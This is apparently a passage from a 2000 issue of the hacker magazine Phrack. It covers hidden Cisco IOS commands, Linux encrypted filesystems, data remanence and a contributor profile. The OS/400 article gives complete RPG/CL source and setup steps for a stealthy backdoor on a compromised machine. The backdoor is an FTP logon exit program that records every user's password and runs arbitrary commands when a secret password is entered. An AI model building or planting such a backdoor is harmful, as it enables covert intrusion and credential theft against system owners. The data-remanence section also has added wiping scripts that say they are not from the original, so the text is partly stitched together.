picking a random location within memory shows what segment that specific address falls under. same info can be gleaned from the root command. ctalkb#sh region a 0x07800000 Address 0x07800000 is located physically in : Name : iomem2 Class : Iomem Media : R/W Start : 0x07800000 End : 0x07FFFFFF Size : 0x00800000 @sh sum this takes the compressed image and computes its checksum. this is compared with the previously stored checksum to ensure integrity. ctalkb#sh sum New checksum of 0x36D03E96 matched original checksum ctalkb# @sh timers (show timers for timer command in config mode) ctalkb#sh tim State Handle interval due invoked missed Process @test transmit (test the transmission of L2 frames) this command allows you to send the specified number of frames to the specified destination: ctalkb#test transmit interface: Ethernet3/0 total frame size [100]: 1) To this interface 2) To another interface 9) Ask for everything Choice: 2 Encapsulation Type: 1) Ethertype 2) SAP 3) SNAP 4) SNAP (Cisco OUI) 5) SNAP (EtherV2 OUI) 6) Novell 802.3 Choice: 1 Protocol type: 1) IP 2) XNS 3) IPX 9) Ask for everything Choice: 1 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (in config mode) @boot system rom if the system has an image burned in on rom, this command allows you to revert to that image instead of the image stored on some other secondary media (flash card). ctalkb(config)#boot system rom The 'boot system rom' command is not valid for this platform. It has been translated to 'boot system flash bootflash:' @boot module the command is there, but it doesn't seem to do anything besides barf. 00:34:02: %PARSER-3-BADSUBCMD: Unrecognized subcommand 11 in configure command 'boot module a' @exception-slave dump X.X.X.X informs the router where to dump the core image. @exception-slave protocol tftp tells the router what protocol to use when dumping the core image. @exception-slave corefile tells the router what to name the corefile. 
note that this corefile has to be at least 666 on the tftp server for the router to be able to write it. @ip slow-convergence i haven't been able to see any difference in the router performance after enabling this command. regardless, it does not look like a command which would improve the router performance. @ip tftp boot-interface tells the router what interface to find its image in the case that it wants to boot net via tftp. @loopback diag all of these loopback commands allow you to loop the hardware at specific points so that you can isolate hardware faults. e.g. this is not just a loopback net and loopback local command set. also, not all pieces of hardware can be looped at all the below points. @loopback dec (at dec chip) @loopback test @loopback micro-linear @loopback motorola @scheduler max-task-time 200 (last val in milliseconds) this knob allows you to set the number of milliseconds a specific process is on CPU before it reports debugging information. a relatively easy way to report which process is hogging. sh proc cpu is obviously the best way to track down cpu hogs while on the router, but this command allows you to track down more insidious hogs. 00:13:18: %SYS-3-CPUHOG: Task ran for 308 msec (3/1), process = Virtual Exec, PC = 603C9AD8. @scheduler heapcheck process (memory validation.. after proc) @scheduler heapcheck poll (memory valid after some poll) @scheduler run-degraded (perhaps in a failure mode?) causes the scheduler to attempt to keep running even in the face of some sort of fatal process error. the default action of IOS is to have this knob turned off and to crash the router upon the recognition of a fatal error. this is done on a per-process basis. obviously, some processes are more critical than others and moving the offending process out of the scheduler won't really buy you any time or information. @service internal this is a really nifty command. 
turning it on in global configuration mode allows you to view some previously hidden commands. turn it on by default and you will eventually find some extras. some commands are not even accessible unless this is turned on. (sh proc all-events fex) @service slave-coredump this allows you to dump core when applicable to some slave machine for logging purposes. this does take a long time depending on the amount of memory in the router (copying 128MB with varying link speeds. you do the math). it is important to note that this copying occurs before the router enters usable mode, so you basically have added quite a bit of delay into the reload time. the exception-slave commands inform the router where to dump the core image. @service log backtrace (provides traceback with every logging instance) -Traceback= 603C9AE0 603546C0 60354A48 6035CA58 6035C3F4 6035C34C 60373EBC 603B6D2C 603B6D18 in bgp config: @neighbor ctalkb-out filter-as 100 d % filter-as is an obsolete subcommand, use filter-list instead this is a nifty command in that it gives you a little more insight into whats happening. i would prefer this command even though it has been deprecated in favor of the filter-list command. reasoning: this command is more specific. in router isis config: @partition-avoidance not quite sure what this does since i don't have a complex isis setup to test. |0x03|------------------------------------------------------------------------| |----------------------- OS/400 Exit Point Programming -----------------------| |clever ------------------------------------------------------| Introduction Exit points enable programmers to embed custom logic in otherwise non-configurable system functions. At a certain stage of its execution, a program with an exit point will execute the programs which have been registered with its exit point, passing relevant parameters to the called programs. 
At that time, the exit point program can do anything it likes with the parameters passed to it and modify the behavior of the calling program by passing back values, if it decides to do so.

Exit point programming is somewhat esoteric. Most people who deal with the AS/400 are not aware of the existence of exit points, and most of those who know about them do not use them. System administrators who care about security have used them since they became available to improve system security by logging things like user profile creation or limiting the use of system facilities to a subset of the users who could ordinarily make use of them.

Suppose that you have gained access to a typical AS/400 system. Its administrators are concerned about security, but they lack a consistent security plan and the skill to implement it, even if they did. Even so, the misconfiguration that allows you to gain access may be noticed and fixed at any time. A new user profile would probably be spotted. You need a way to retain control over the machine that won't be noticed by most people.

Exit points do most of the work for you.

One exit point present in the ftp server software is "FTP Server Logon", named QIBM_QTMF_SVR_LOGON. Its parameter format is TCPL0100.

TCPL0100:

Application Identifier          4B    Input
User Identifier                 *     Input
User Identifier length          4B    Input
Authentication String           *     Input
Authentication String length    4B    Input
Client IP Address               *     Input
Client IP Address length        4B    Input
Return Code                     4B    Output
User Profile                    10A   Output
Password                        10A   Output
Initial Current Library         10A   Output

The parameters marked 'Input' are set by and received from the system; these fields contain user signon information, which we should log. The only output parameter about which we care in this instance is 'Return Code', which we must set to 1, telling the system to proceed with authentication and that the password provided must match the actual password of the user profile for authentication to succeed.
Other return code values cause the system to do various things that you might find useful. Consult the documentation if you are curious. So. 1. ftp> open x.x.x.x Connected to x.x.x.x. 220-QTCP at x.x.x. 220 Connection will close if idle more than 5 minutes. Name (x.x.x.x:root): werd 331 Enter password. Password: f.u.c.k.493 2. The exit program is called. The server passes it the parameters mentioned above. 3. The exit program does whatever it likes. It sets the 'Output' parameters, if it likes. The exit program returns. 4. The server considers the parameters passed back to it and does whatever is indicated by those parameters. Below is a stripped-down version of one tool I use for this. It isn't hidden. It should only be used on boxes whose administrators are somewhere between 'Don't Care' and 'Making A Clumsy Effort At Security'. That is to say, most of them. Names/types. F01 RPGLE F02 CLLE FP PF Creating. CRTPF FILE(x/FP) SRCFILE(x/x) TEXT(*BLANK) CRTRPGMOD MODULE(x/F01) SRCFILE(x/x) DBGVIEW(*NONE) OUTPUT(*NONE) CRTCLMOD MODULE(x/F02) SRCFILE(x/x) OUTPUT(*NONE) LOG(*NO) DBGVIEW(*NONE) CRTPGM PGM(x/F) MODULE(x/F01 x/F02) TEXT(*BLANK) ALWUPD(*NO) USRPRF(*OWNER) DLTMOD MODULE(x/F01) DLTMOD MODULE(x/F02) Put F and FP somewhere QTCP can find them. QUSRSYS, maybe. Register x/F with QIBM_QTMF_SVR_LOGON using WRKREGINF. Restart ftp. Using. The command goes in the user field. The special authorization string goes in the password field. Normal signons get logged in FP. Ignore the error; data area TEST does get created in QGPL. ftp> open x.x.x.x Connected to x.x.x.x. 220-QTCP at x.x.x. 220 Connection will close if idle more than 5 minutes. Name (x.x.x.x:root): crtdtaara qgpl/test *dec 331 Enter password. Password: itsmeclever 530 Log on attempt by user CRTDTAARA rejected. ftp: Login failed. Remote system type is . ftp> Code. 
(F01) FFP O A E DISK D S c 'itsmeclever' D DParms pr extpgm('F01') D AppID 9b 0 D UsrID 100a D UsrIDLen 9b 0 D AutStr 32a D AutStrLen 9b 0 D ClntIP 15a D ClntIPLen 9b 0 D Rcd 9b 0 D UsrPrf 10a D Pwd 10a D InlCurLib 10a D DParms pi D AppID 9b 0 D UsrID 100a D UsrIDLen 9b 0 D AutStr 32a D AutStrLen 9b 0 D ClntIP 15a D ClntIPLen 9b 0 D Rcd 9b 0 D UsrPrf 10a D Pwd 10a D InlCurLib 10a D DLog pr D Type 10a value D Text 200a value D DExcCmd pr D Cmd 100a value C if %subst(AutStr:1:AutStrLen) = S C callp ExcCmd(%subst(UsrID:1:UsrIDLen)) C eval *inlr = *on C return C endif C C callp Log('FTP': C %subst(UsrID:1:UsrIDLen)+ ' '+ C %subst(AutStr:1:AutStrLen)+ ' '+ C %subst(ClntIP:1:ClntIPLen)) C C eval Rcd = 1 C C eval *inlr = *on C return PLog b D pi D Type 10a value D Text 200a value C time FPTS C eval FPTYPE = Type C eval FPTEXT = Text C C write FPR P e PExcCmd b D pi D Cmd 100a value C callb 'F02' C parm Cmd P e - - - - - - - - - - (F02) PGM PARM(&COMMAND) DCL VAR(&COMMAND) TYPE(*CHAR) LEN(100) MONMSG MSGID(CPF0000) EXEC(GOTO CMDLBL(ERROR)) CHGJOB LOG(0 99 *NOLIST) LOGCLPGM(*NO) CALL PGM(QCMDEXC) PARM(&COMMAND 100) ERROR: ENDPGM - - - - - - - - - - (FP) A R FPR A FPTS 14S 0 A FPTYPE 10A A FPTEXT 200A Hope this helps someone. clever 20000222 |0x04|------------------------------------------------------------------------| |---------------------- Linux and Encrypted Filesystems ----------------------| |phunda mental --------------------------------------------| Most people don't realize it, but Linux has incredibly robust support for encrypted filesystems. This functionality is not present in the stock kernel due to U.S. export regulations, but it can be easily added by obtaining the patchset for your kernel version from www.kerneli.org. 
In this article, I will present a quick introduction to setting up strong encryption within the Linux kernel, and then I will present a few configurations that allow for separately encrypted home directories for each user, encrypted disk partitions, etc.

First, you must download util-linux-2.9e.tar.gz[1], and the kernel source patches. For the purposes of this article, I'll assume you are running kernel 2.2.4; therefore you would get patch-int-2.2.4.1.gz[2]. In /usr/src do ln -s linux lin.2.2.4 (the patch expects this to be the name of the source directory) and apply the patch with zcat patch-int-2.2.4.1.gz | patch -p0.

Now look in linux/Documentation/crypto. There are some patches in there to Linux utilities. Unpack the util-linux distro, apply the necessary patch, and build the new utilities. You'll need to install the new losetup and mount commands. Remember that mount needs to be suid root if you want users to have the ability to mount encrypted volumes.

Now build a kernel with make menuconfig, and take a look at the dox in the Documentation/crypto directory. You'll notice that the kernel patches give support for Blowfish, DES, DFC, IDEA, MARS, RC6 and Serpent. These ciphers can be used by the networking code, or the loopback device. The loopback device also has special support for CAST128 and Twofish.

Once you have your new kernel up and running, you can make a blowfish encrypted volume like so:

$ dd if=/dev/zero of=vol.img bs=1024 count=2000
$ losetup -e blowfish /dev/loop0 vol.img

Losetup will prompt you for a passphrase. This passphrase is hashed with RIPEMD-160 in order to key the cipher.

$ mkfs.ext2 /dev/loop0
$ losetup -d /dev/loop0 #disconnect the loopback device

All of the preceding commands can be issued as a user; to actually mount the volume, you will need root status, or the appropriate line in /etc/fstab.
# mount vol.img /mnt -o encryption=blowfish

Mount will prompt you for a passphrase, enter the one you gave to losetup, and the volume will get mounted on /mnt. In order for user joe to mount ~/.img on ~/secure a line in fstab like this is needed:

/home/joe/.img /home/joe/secure ext2 noauto,user,rw,exec,encryption=blowfish

Now joe can mount his volume with the command "mount ~/secure".

A similar tactic can be used to have joe's entire home directory encrypted. Make a directory called /usr/imgs/joe and let the directory "joe" be owned by user joe. Place an encrypted img called home.img in /usr/imgs/joe and modify /etc/profile to check if the user's home directory image exists, and if it does, mount the encrypted image onto /home/$USER (if it is not already mounted). Then, all that is needed is an appropriate line in /etc/fstab to allow joe to mount onto /home/joe.

I personally use this scheme to keep my home directory encrypted on my machines. When I log in, /etc/profile gets executed and it asks me for the passphrase needed to mount my home directory. A crontab periodically runs and tries to unmount my home directory, so that when I log out and any jobs I left running end, my home directory will get unmounted. If you use xdm to automatically launch X on boot up, then you will need to modify Xsession in the xdm directory to launch an xterm that executes the mount command so that the user can mount his home directory before his ~/.xsession gets executed.

Consistent with the UNIX philosophy that a device is a file, Loopback encryption also works for block devices. To encrypt disk partitions, Linux will need a small unencrypted root partition (just enough for the kernel, /dev, /etc, /lib and the basic binaries), maybe 15 or 20 meg. /dev/hda2 will contain a filesystem that houses /usr, /var, /home and whatever else you have. It will get mounted on /fs/hda2.
You can set this filesystem up like so:

$ losetup -e blowfish /dev/loop0 /dev/hda2
$ mkfs.ext2 /dev/loop0
$ mount /dev/loop0 /fs/hda2

Now you can copy all of /usr and everything to /fs/hda2 and just symlink /fs/hda2/usr to /usr so that everything works. Alternatively, if you have separate partitions for /usr, /var, and /tmp you can set them up as individual partitions. Set up your fstab as follows:

/dev/hda2 /fs/hda2 ext2 defaults,encryption=blowfish 0 0

Now, when you boot, you will get prompted for the passphrase needed to mount /fs/hda2. An attacker will get virtually nothing from your machine.. they won't even know what applications you have installed. I use a similar scheme to keep the contents of removable media and PCMCIA flash cards encrypted.

The kernel patches have other applications besides encrypted filesystems. The patches give support for ENskip, and a tunneling hack which allows encrypted IP through UDP called CIPE. Check out kerneli.org for more info on this stuff.

Credit, and thanks go to the kernel and patch set maintainers.

References:

1. ftp://ftp.aanet.ru/pub/Linux/utils/util-linux-2.9e.tar.gz
2. ftp://ftp.kerneli.org/pub/kerneli/v2.2/patch-int-2.2.4.1.gz

|0x05|------------------------------------------------------------------------|
|------------------------------ Data Remanence -------------------------------|
|phunda mental --------------------------------------------|

So, you've encrypted all your goodies with 3DES, selected strong passphrases, and now you are content to sit back and have a beer, knowing that your stuff is secure, right? Yeah. Sure it is.

We are facing the problem of data remanence, and it's a bitch. Strong crypto only protects the ciphertext; if the plaintext is sitting around on your hard drive you're still screwed. Data remanence, as the name implies, is the residual remains of data after it has been deleted, cleared or purged. In this document, the term "deleted" refers to the normal OS-supplied delete command.
Clearing data refers to a process that attempts to destroy data such that it cannot be reconstructed with normal OS-supplied commands or functions, including specially created software. Purging refers to a process (generally in hardware) that attempts to defeat all of the above methods of reconstruction, along with laboratory-based reconstruction techniques. Obviously, DR occurs in many forms, and can be exploited in a few different ways.

Software Methods

The first way that DR can bite us in the ass is one that any competent DOS/Windows user should know about: the undelete command. The standard MS delete just kills the pointer to the file in the FAT, while the data itself still sits on the disk. Undelete just restores that pointer, and we can get some (or all) of those data bits back. Well, depending on which color hat we are wearing at the moment, this may be helpful. If you are snooping on some alien machine, remember to try undelete when looking for interesting files. Else, get a program that can help you clear the data. In a pinch, defragging a hard drive can sometimes defeat something like undelete (depending on how the OS in question works).

Awhile back I was sitting in IRC, discussing DR under Linux. The standard response that I got was that since ext2 (the Linux filesystem) doesn't operate like FAT, the undelete-type practice can't be done and so we have nothing to worry about. This simply isn't true. Under linux, do the following (you may need root, depending on how you configured your setup):

dd if=/dev/zero of=disk.image bs=1024 count=300
mkfs.ext2 disk.image
mount disk.image /mnt -o loop
cd /mnt

We just made a 300k looped filesystem, and mounted it on /mnt. Now CD to /mnt and create a file with some known text in it .. try:

ps aux > sensitive.file
sync
rm sensitive.file

Now, we've deleted our sensitive file, but as will be demonstrated, this file has not been cleared.
Now umount /mnt and do:

strings < disk.image | grep USER

You'll see some text from the ps. Now, if your gear got confiscated imagine someone just running this command on /dev/hda1, or whatever. Don't think DoJ wouldn't pay people to weed through all the junk to obtain a few juicy bytes, or run some nice pattern matching software on the strings output to find stuff that looks interesting. Or, maybe you don't want the contents of a file .. maybe you want a passphrase, or the internal state of an RNG or a cipher? Dig around in the swap partition, maybe you'll get lucky.

This is an example of what DoD calls a "keyboard attack" in the "green book[1]." It is an attack to exploit the remnant data on a system using a software method. We need a clearing technique here too, and a good way is to zero the actual bits of the file; ext2 will eventually support this internally[2], but for now you can just rm the file and then make a new file of all zeros that fills the entire disk. Let's try that.

mount disk.image /mnt -o loop
cd /mnt
dd if=/dev/zero of=output bs=100k #wait for error
sync
rm output

Now umount the disk.image and run strings on it again. You'll notice that the ps output is gone. You'll also notice that some of the filename is still there. If the file is under some sub-directory, you can rmdir the directory and use the above method. If the file is at root-level, you're hosed: people can see your filename.

Overwriting the file's bits one-for-one with zeros ensures that one will not be able to read the data back with the recording device itself; thus software, or "keyboard" attacks are successfully defeated by such software measures.

It is a good practice to create a script that checks /proc/meminfo under Linux. If there is enough RAM free to hold any crap floating in swap, then free the swap partition, zero it (or use other techniques, discussed below), make a new swap partition and reattach it. This could be put in a cron job that runs at off-peak hours.
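The swap check described above, sketched as an added example (it is not code from the original article). It assumes a modern /proc/meminfo with SwapTotal, SwapFree and MemAvailable fields and a /proc/swaps device list; the function names, the 10% headroom and the sample data are illustrative, and by default it only prints the commands it would run.

```shell
#!/bin/sh
# Added example: clear swap only when free RAM can absorb what is in it.
# Assumptions (not from the article): field names of a modern /proc/meminfo,
# /proc/swaps for the device list, 10% headroom, dry run unless --apply.
RUN=echo

# meminfo_kb FIELD [FILE] -> value of FIELD in kB, empty if the field is missing
meminfo_kb() {
    awk -v f="$1:" '$1 == f { print $2; exit }' "${2:-/proc/meminfo}"
}

# swap_used_kb [FILE] -> kB of swap currently in use
swap_used_kb() {
    total=$(meminfo_kb SwapTotal "$1")
    free=$(meminfo_kb SwapFree "$1")
    echo $(( ${total:-0} - ${free:-0} ))
}

# can_clear_swap [FILE] -> exit 0 when available RAM exceeds swap in use + 10%
can_clear_swap() {
    avail=$(meminfo_kb MemAvailable "$1")
    # older kernels have no MemAvailable; fall back to MemFree
    [ -n "$avail" ] || avail=$(meminfo_kb MemFree "$1")
    used=$(swap_used_kb "$1")
    [ "${avail:-0}" -gt $(( used + used / 10 )) ]
}

# swap_partitions [FILE] -> active swap partitions, one per line.
# Swap files are skipped: dd onto a regular file would not stop at its old size.
swap_partitions() {
    awk 'NR > 1 && $2 == "partition" { print $1 }' "${1:-/proc/swaps}"
}

# clear_swap_device DEV -> swapoff, zero, re-create and re-enable DEV
clear_swap_device() {
    dev=$1
    # keep the old UUID so that an fstab entry by UUID still matches afterwards
    uuid=$(blkid -s UUID -o value "$dev" 2>/dev/null || true)
    # never zero a device that is still in use as swap
    $RUN swapoff "$dev" || return 1
    # dd ends with "No space left on device" at the end of the partition; expected
    $RUN dd if=/dev/zero of="$dev" bs=1M || true
    $RUN mkswap ${uuid:+-U "$uuid"} "$dev"
    $RUN swapon "$dev"
}

# Constructed sample data (not captured from a real host): 300 MB sits in swap
# and 900 MB of RAM is available.
sample_meminfo() {
    cat <<'EOF'
MemTotal:        2048000 kB
MemFree:          204800 kB
MemAvailable:     921600 kB
SwapTotal:       1048576 kB
SwapFree:         741376 kB
EOF
}

sample_swaps() {
    cat <<'EOF'
Filename                Type        Size     Used    Priority
/dev/constructed0       partition   1048576  307200  -2
/swapfile.constructed   file        524288   0       -3
EOF
}

# "--check" prints the plan for this host, "--apply" executes it (needs root).
case "${1:-}" in
    --check|--apply)
        if [ "$1" = "--apply" ]; then RUN=; fi
        if can_clear_swap; then
            for d in $(swap_partitions); do
                clear_swap_device "$d" || echo "skipped $d: swapoff failed" >&2
            done
        else
            echo "not enough free RAM to absorb swap; nothing done" >&2
        fi
        ;;
esac
```

Run from cron with --apply at off-peak hours, as the text suggests; a failed swapoff leaves the device untouched.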
There are also programs like "wipe.com" (DOS)[3], and "Burn" (Mac)[4] that wipe the bits of certain files, allowing a more controlled (and thus faster) method of wiping remnant data. I don't know of a way to securely wipe files under Linux other than by filling the disk. The programs that I found that report to do so fail, and I can't think of a reliable way to do it outside of ext2.c.

Hardware Methods

There is a third type of attack, however, that does not depend on what the device (say, a hard disk) claims is on the media. This type of attack analyzes the media directly; we'll call it a laboratory attack.

A laboratory attack is highly theoretical, but we had better talk about it anyway. The first thing we have to remember is that digital media isn't purely digital: we record our bits on an essentially analog medium, which is precisely why we need stuff like MFM (modified frequency modulation) encoding; an actual DC level would erase data, not record it.

So, let's talk about disks, and cover some magnetic recording properties real quick. I'm going to be fast and loose with the electronics; I know it is terribly inaccurate, we just need the basic concepts here.

In general, magnetic recording is achieved by issuing a magnetic charge onto some ferrous-type material with an electromagnet. To read the data back, the juice to the electromagnet is shut off, and the disk spins by the coil of the magnet, which induces a voltage in the electromagnet, effectively making a small generator.

Now, for the sake of accuracy we don't just spit bits out into the magnetic medium, because DC levels don't work with transformers, which is what our read/write head is, basically. So we need to encode it in an analog signal using some modulation technique.

For the sake of argument, let's say our disk is using something like frequency shift keying (FSK). In reality, our drives don't do this, but our modems do. I'll use FSK since it is easier to talk about, and easy for newbies to understand.
The way we encode our data is to take every digital one and play an analog tone for some time, T, and some other tone for a digital zero, also for some time T. Maybe we encode 0 as 2600 Hz and 1 as 2000 Hz (the Kansas City standard for storing digital info on cassette tape is 0 = 2400 Hz and 1 = 1200 Hz). The reason I'm reducing this to a simplified audio analogy will soon be obvious.

If you record over a commercial cassette tape with a shitty tape recorder, where there are periods of silence in your recording you may hear the original commercial tune. This remnant signal is there all the time, not just during silence. What has happened is that the magnetic flux delivered by the read/write head of your tape recorder was not powerful enough to completely change the polarization of the magnetic particles on the tape for the time that the particles were exposed. Those particles act in a predictable way, and if we know their current state, and the signal applied to them the last time, we can recover the previous state. Chalk this one up to magnetic hysteresis; it could also be due to the head of the tape recorder not being aligned perfectly. More on this option below.

If a particle on a disk has a current polarization strength of A, and we know what sort of flux was applied to the particle (which we can find by examining the read/write head) then we can find the state of the particle prior to the last write to it, which allows us to reconstruct the data. Real-world bit recovery would simply require looking at these particles and taking into account the encoding scheme used. The SFS (Secure File System) documentation gives a good description of many different encoding schemes.

As I said, this is a theoretical attack. I am not aware of it ever actually having been used to recover data. How can we defeat this attack? By overwriting the data many times.
If we overwrite our data many times, the stored charge on the particle gets constantly closer to the upper-end ideal value, which disguises the data "underneath." We can use several applications of random bits, and then several applications of 00h's and FFh's to overwrite the data. The random bits ensure that the attacker doesn't find a pattern. The multiple applications of FF expose the particles to the magnetic flux for a longer period of time. Each application gets those particles closer and closer to the ideal representation of FF. The truly paranoid will want to do all of this several times. Some recommend writing zeros after the ones. This is probably pure paranoia, and it might be a good idea.

As alluded to above, there is another type of data remanence that can be attacked in the lab due to variance in the position of the read/write head. As the disk spins, the head will float over different portions of the disk each revolution. When a write occurs, it may charge certain particles and on an overwrite it may miss some of those particles, leaving the original information behind for exploitation by the lab. This lets an attacker read further back into the data record than by weeding out signals by cancellation, and is probably easier to perform in some respects. We have no control over this whatsoever in software.

To protect against this attack requires either degaussing of the media, or encryption of the entire device from the first moment it is used until the last.

Using encryption stamps out all of the above problems in one clean, elegant stroke. Imagine a device that sits in-line between your IDE (or SCSI) adapter and the disk controller of the drive. All attempts by the PC to negotiate with the drive are intercepted by this device, and the data is either encrypted or decrypted as needed and sent along. Thus everything that ever touches the drive: file system formatting, the OS ... everything gets encrypted and stored.
The entire operation would be transparent to the host computer, and independent of its processing. The user merely gives a key to this controller at start up: maybe there is a keypad embedded into a 5.25" faceplate that is mounted on the computer's case. Such a hardware solution not only takes care of data remanence issues but also helps to secure the computer as a whole: with the partition table and OS encrypted, the machine cannot boot without the user having set up the in-line filter with the correct key.

Can a well-funded adversary pull off a laboratory attack like those discussed here? Probably. So if you're not using some form of encryption, you might want to start thinking about it. For the stuff that no one but you can know about, keep the plaintext on floppies and the ciphertext on your hard drive. Floppies can be destroyed or degaussed easily. Remember to watch your swap partition though; it is probably wise to disengage swap when manipulating sensitive material. Best of all, RAM is cheap. Buy 256M of it and give up swap space completely.

Against a sufficiently powerful attacker who has your hard drive, you are in a world of hurt without in-line encryption. Just how powerful "sufficiently powerful" needs to be to actually make this stuff work is open to speculation.

Notes:

1. NCSC-TG-025 "A Guide to Understanding Data Remanence in Automated Information Systems"
   http://www.geekstreet.com/green.html
2. This was all tested with Linux kernel version 2.0.35. I do not know if 2.1.* will ever have a newer ext2 or not. Look into the chattr command on your machine, and dig into the kernel source to see if the ext2 code does anything or not. On 2.0.*, it does nothing.
3. From the No-where utilities, get it from your favorite HP filez site.
4. Burn is available from the Info-Mac archives.
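
The pass sequence from the Hardware Methods discussion above (several applications of random bits, then 00h and FFh), as an added example that is not part of the original article. The function names, the default of three passes each and the --wipe switch are assumptions; the target is meant to be an unmounted image such as disk.image or an unmounted block device.

```shell
#!/bin/sh
# Added example (not from the original article): overwrite an unmounted
# image file or block device in place with passes of random bits followed
# by rounds of 00h and FFh. Function names and defaults are hypothetical.

# target_size PATH: size in bytes of a regular file or block device.
target_size() {
    if [ -b "$1" ]; then blockdev --getsize64 "$1"
    else wc -c < "$1" | tr -d ' '
    fi
}

# pattern_stream random|00|ff: endless stream of the requested fill.
pattern_stream() {
    case "$1" in
        random) cat /dev/urandom ;;
        00)     cat /dev/zero ;;
        ff)     LC_ALL=C tr '\000' '\377' < /dev/zero ;;
    esac
}

# overwrite_pass TARGET PATTERN: one full pass, written in place.
overwrite_pass() {
    case "$2" in random|00|ff) ;; *) echo "bad pattern: $2" >&2; return 1 ;; esac
    size=$(target_size "$1") || return 1
    # conv=notrunc writes over the existing contents instead of truncating.
    pattern_stream "$2" 2>/dev/null | head -c "$size" |
        dd of="$1" bs=64k conv=notrunc 2>/dev/null || return 1
    sync    # push this pass to the medium before the next one starts
}

# sanitize TARGET [RANDOM_PASSES] [FIXED_ROUNDS]: random passes first, then
# FIXED_ROUNDS rounds of 00h followed by FFh, so the last pass is FFh.
sanitize() {
    target=$1 rnd=${2:-3} rounds=${3:-3}
    [ -e "$target" ] || { echo "no such target: $target" >&2; return 1; }
    i=0
    while [ "$i" -lt "$rnd" ]; do
        overwrite_pass "$target" random || return 1
        i=$((i + 1))
    done
    i=0
    while [ "$i" -lt "$rounds" ]; do
        overwrite_pass "$target" 00 || return 1
        overwrite_pass "$target" ff || return 1
        i=$((i + 1))
    done
}

# marker_hits TARGET STRING: lines of the raw image still containing STRING
# (the article's "strings | grep" check, run directly on the bytes).
marker_hits() { LC_ALL=C grep -a -c -- "$2" "$1" || true; }

# non_ff_bytes TARGET: count of bytes that are not FFh after the final pass.
non_ff_bytes() { LC_ALL=C tr -d '\377' < "$1" | wc -c | tr -d ' '; }

case "${1:-}" in
    --wipe) sanitize "${2:?usage: $0 --wipe TARGET}" ;;
esac
```

As the article notes, software has no control over head positioning, so this covers what the drive itself will read back and not the off-track residue.
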
|0x06|------------------ Phrack 55 Addendum and Errata -----------------------|
|-----------------------------------------------------------------------------|

P55-14@71:
I would like to make the following correction in my article "A GPS Primer" from Phrack 55. The Teledesic project is _not_ a MEO satellite venture, but rather, it uses Low Earth Orbit (LEO) satellites. Thanks to Eric Rachner for pointing this out.
[ Thankz to e5 for submitting this correction. ]

P55-18:
File 18 was erroneously listed as file 17.

|EOF|-------------------------------------------------------------------------|

- P H R A C K M A G A Z I N E -

Volume 0xa Issue 0x38
05.01.2000
0x04[0x10]

|------------------------------ P R O P H I L E ------------------------------|
|-----------------------------------------------------------------------------|
|----------------------------------- sw_r ------------------------------------|

The Phrack Prophile iz intended to be a short biography on the individual in question. It'z Phrackz way to recognize that this person has done something worthy of mention in some capacity. More or less a soap-box, The Prophile givez the person a chance to spout off about whutever they want and aggrandize themselvez to their heart'z content. This iz *their* time to shine.

|------------------------------ P E R S O N A L ------------------------------|

|-Handle -------------| Shockwave Rider
|-Previouz handlez ---| The Phelon, cpmhaqr, guest_, master blaster, s1thl0rd, others
|-Handle origin ------| 1975 book by John Brunner
|-Call him -----------| Varies depending on who you are
|-Reach him ----------| Don't call me, I'll call you .. (email: swr@gti.net)
|-Date of birth ------| 5/16/80
|-Height -------------| 5'10"
|-Weight -------------| 170
|-Eye Color ----------| Brown
|-Hair Color ---------| Black
|-Cool crap owned ----| one line isn't gonna do this justice.. ;)
|-Sitez I run --------| various private systems
|-URLz ---------------| the web is gay. but check these urls out anyway:
                        http://www.suzie.org
                        http://www.velkro.net/swr

|----------------------------- F A V O R I T E Z -----------------------------|

|-Women --------------| Brunettes with class, wit, and intelligence. hi suzie!@
|-Carz ---------------| As of this writing, I don't really drive.. once I settle into my new location, I plan to purchase a new vehicle. (I've always been into cars and performance vehicles, so it'll be something FAST!@). I have tons of 'favorite' cars, but among the favorite of the favorites at the moment are the Porsche 911, Dodge Viper, Porsche 959 (the only reason it doesn't win hands down is 'cuz it's still not street-legal, which sucks) & Acura's NSX-T.
|-Foodz --------------| All kinds - I'm Indian, so naturally Indian's my favorite.. but I also love Italian, Thai, Chinese, etc. My favorite foods overall are probably steak and pizza. If made right, I could live on both forever without tiring of either - though I'd probably want Indian food occasionally (of course).
|-Alcohol ------------| Wayyy too much to list here. I like good beer, strong whiskey.. and pretty much anything else as long as it's wet & alcoholic(!@).
|-Music --------------| Major hip-hop fan. I'm also into hard rock/heavy metal, classical.. pretty much everything, except for the perennial exception that is Country. Favorite bands/groups off the top of my head include - NWA, Tribe Called Quest, Eazy-E, Beastie Boys, Nirvana, Tool, Eric B+Rahkim, Slick Rick, Metallica, Korn, Beck, Ice Cube, KRS-ONE, Public Enemy, Front 242, Guns N Roses, Schooly D, Cypress Hill, Led Zeppelin, Wu-Tang Clan, MC Eiht, MC Ren, Garbage (Shirley Manson r000lz), NIN, Toadies, Aerosmith, Sir Mixalot, Me First & The Gimme Gimmes, DR Octagon, DJ Rectangle, Eminem, Weird Al, Motley Crue, Mr. Bungle, Red Hot Chili Peppers, Gang Starr, Run-DMC..
|-Moviez -------------| HEAT, Goodfellas - pretty much anything with DeNiro or Pacino in it, GodFather I, Pulp Fiction, Strange Brew, Bill & Teds * (classics), South Park, El Mariachi
|-Authorz ------------| quick list -
                        Fyodor Dostoevsky (Crime & Punishment, Brothers Karamozov)
                        Dave Barry (Everything)
                        Joseph Heller (Catch-22)
                        WR Stevens (TCP/IP Illus 1-2, others)
                        J.D. Salinger (Catcher In the Rye)
                        George Orwell (1984, Animal Farm)
                        John Brunner (Shockwave Rider)
                        J.R.R. Tolkien (I loved the Lord of the Rings Trilogy when I was a kid, and "The Hobbit" also),
                        Ray Bradbury (Something Wicked This Way Comes)
                        Robert Silverberg (the Pontifex Valentine and Gilgamesh books.. part of my fantasy fiction phase, around the same time as Tolkien)
                        Victor Harris (The Book of Five Rings),
                        Nicholas Pileggi (WiseGuy),
                        Sun Tzu (The Art of War),
                        Chris Drake & Kimberley Brown (PANIC!, the most readable tech book I've ever read - which is still incredibly useful)
                        Neal Stephenson (Snowcrash)
                        William Gibson (Everything)
|-Turn ons ------| Tits (all shapes, sizes, colors & flavors), legs,(long and smooth), platform sandals, belly button piercings, long dark hair, two chicks doing it with each other, summer dresses, and of course intelligence + sense of humor.. (those are all in reference to women)
|-Turn offs ----| Anal retentiveness, pedantry, miserliness, posing/pretentiousness, stupidity (those apply to both sexes).
